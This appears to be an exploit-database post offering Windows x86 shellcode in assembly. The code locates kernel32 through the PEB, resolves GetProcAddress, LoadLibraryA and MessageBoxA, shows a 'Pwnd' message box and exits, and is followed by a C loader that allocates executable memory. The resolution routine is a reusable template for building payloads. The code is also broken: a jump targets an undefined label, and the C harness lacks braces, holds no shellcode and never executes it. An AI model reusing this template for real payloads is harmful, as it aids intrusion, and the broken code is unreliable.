; Exploit Title: Windows x86 - spawn custom MessageBox Win7/10 (223 bytes)
; Date: 2019-11-14
; Author: bolonobolo
; Vendor Homepage: None
; Software Link: None
; Tested on: Windows x86
; Comments: spawn custom Message Box
; CVE: N/A

global _start

section .text

	xor ecx, ecx                ; zeroing register ECX
	mul ecx                     ; zeroing register EAX EDX
	mov eax, [fs:ecx + 0x030]   ; PEB loaded in eax
	mov eax, [eax + 0x00c]      ; LDR loaded in eax
	mov esi, [eax + 0x014]      ; InMemoryOrderModuleList loaded in esi
	lodsd                       ; program.exe address loaded in eax (1st module)
	xchg esi, eax				
	lodsd                       ; ntdll.dll address loaded (2nd module)
	mov ebx, [eax + 0x10]       ; kernel32.dll address loaded in ebx (3rd module)

	; EBX = base of kernel32.dll address

	mov edx, [ebx + 0x3c]       ; load e_lfanew address in ebx
	add edx, ebx				
	mov edx, [edx + 0x78]       ; load data directory
	add edx, ebx
	mov esi, [edx + 0x20]       ; load "address of name"
	add esi, ebx
	xor ecx, ecx

	; ESI = RVAs

	inc ecx                             ; ordinals increment
	lodsd                               ; get "address of name" in eax
	add eax, ebx				
	cmp dword [eax], 0x50746547         ; GetP
	jnz getProcAddress
	cmp dword [eax + 0x4], 0x41636F72   ; rocA
	jnz getProcAddress
	cmp dword [eax + 0x8], 0x65726464   ; ddre
	jnz getProcAddress

	mov esi, [edx + 0x24]       ; offset ordinals
	add esi, ebx                ; pointer to the name ordinals table
	mov cx, [esi + ecx * 2]     ; CX = Number of function
	dec ecx
	mov esi, [edx + 0x1c]       ; ESI = Offset address table
	add esi, ebx                ; we placed at the begin of AddressOfFunctions array
	mov edx, [esi + ecx * 4]    ; EDX = Pointer(offset)
	add edx, ebx                ; EDX = getProcAddress
	mov ebp, edx                ; save getProcAddress in EBP for future purpose

	xor ecx, ecx                ; zeroing ecx
	push ecx                    ; push 0 on stack
	push 0x41797261             ; 
	push 0x7262694c             ;  AyrarbiLdaoL
	push 0x64616f4c             ;
	push esp
	push ebx                    ; kernel32.dll
	call edx                    ; call GetProcAddress and find LoadLibraryA address

	; EAX = LoadLibraryA address
	; EBX = Kernel32.dll address
	; EDX = GetProcAddress address 

	push 0x61616c6c                 ;
	sub word [esp + 0x2], 0x6161    ; aalld.23resU
	push 0x642e3233                 ; 
	push 0x72657355                 ; 
	push esp
	call eax                        ; call Loadlibrary and load User32.dll

	; EAX = User32.dll address
	; EBX = Kernel32.dll address
	; EBP = GetProcAddress address 

	push 0x6141786f                 ; aAxo : 6141786f
	sub word [esp + 0x3], 0x61
	push 0x42656761                 ; Bega : 42656761
	push 0x7373654d	                ; sseM : 7373654d
	push esp
	push eax                        ; User32.dll
	call ebp                        ; GetProcAddress(User32.dll, MessageBoxA)

	; EAX 76C6EA71 User32.MessageBoxA
	; ECX 76C10000 OFFSET User32.#2499
	; EDX 00005A12
	; EBX 75290000 kernel32.75290000
	; ESP 0022FF74 ASCII "32.dll"
	; EBP 752E1837 kernel32.GetProcAddress
	; ESI 75344DD0 kernel32.75344DD0
	; EDI 00000000
	; EIP 004010A4 getMessa.004010A4

	add esp, 0x010                  ; clean the stack
	xor edx, edx
	xor ecx, ecx
    push edx 						
    push 'Pwnd'
    mov edi, esp
    push edx
    push 'Yess'
    mov ecx, esp
	push edx                        ; hWnd = NULL
	push edi                        ; the title "dnwP"
	push ecx                        ; the message "sseY"
	push edx                        ; uType = NULL
	call eax                        ; MessageBoxA(windowhandle,msg,title,type)

	add esp, 0x010              ; clean the stack
	push 0x61737365             ; asse
	sub word [esp + 0x3], 0x61  ; asse -a 
	push 0x636F7250	            ; corP
	push 0x74697845             ; tixE
	push esp
	push ebx
	call ebp

	xor ecx, ecx
	push ecx
	call eax
#include <stdio.h>
#include <windows.h>

int main()

    char* shellcode = \
    printf("shellcode length: %i", strlen(shellcode));

    LPVOID lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpAlloc, shellcode, strlen(shellcode));


    return 0;
c:\MinGW\bin>gcc shellcode.c -o shellcode